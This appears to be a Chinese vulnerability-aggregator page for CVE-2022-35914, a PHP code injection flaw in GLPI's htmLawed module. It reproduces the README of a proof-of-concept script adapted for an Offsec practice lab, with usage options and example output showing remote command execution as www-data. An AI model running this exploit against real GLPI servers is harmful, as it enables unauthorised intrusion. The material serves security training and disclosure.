关联漏洞
标题:
GLPI 注入漏洞
(CVE-2022-35914)
描述:GLPI是个人开发者的一款开源IT和资产管理软件。该软件提供功能全面的IT资源管理接口,你可以用它来建立数据库全面管理IT的电脑,显示器,服务器,打印机,网络设备,电话,甚至硒鼓和墨盒等。 GLPI 10.0.2及之前版本存在安全漏洞,该漏洞源于htmlawed 模块中的 /vendor/htmlawed/htmlawed/htmLawedTest.php 允许 PHP 代码注入。
描述
Modified for GLPI Offsec Lab: call_user_func, array_map, passthru
介绍
# CVE-2022-35914_poc
Modified for GLPI Offsec Lab: call_user_func, array_map, passthru
## References
Modified to work for Proving Grounds Practice Lab: GLPI
- https://github.com/glpi-project/glpi/security/advisories/GHSA-c5gx-789q-5pcr
- https://github.com/cosad3s/CVE-2022-35914-poc/blob/main/CVE-2022-35914.py
- Mayfly Blog Post: https://mayfly277.github.io/posts/GLPI-htmlawed-CVE-2022-35914/
## Usage
```bash
pip3 install -r requirements.txt
```
```bash
./CVE-2022-35914.py -h
usage: CVE-2022-35914.py [-h] -u URL -c CMD [--check] [--user-agent USER_AGENT]
CVE-2022-35914 - GLPI - Modified for Offsec Lab: GLPI
options:
-h, --help show this help message and exit
-u URL URL to test
-c CMD Command to launch
--check Just check, no command execution.
--user-agent USER_AGENT Custom User-Agent
```
Example:
```bash
python3 CVE-2022-35914.py -u http://127.0.0.1
[+] Command output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
文件快照
[4.0K] /data/pocs/7488e6165afce45aa98d8f82ac174cde3f29f851
├── [2.6K] CVE-2022-35914.py
├── [1.0K] README.md
└── [ 33] requirements.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。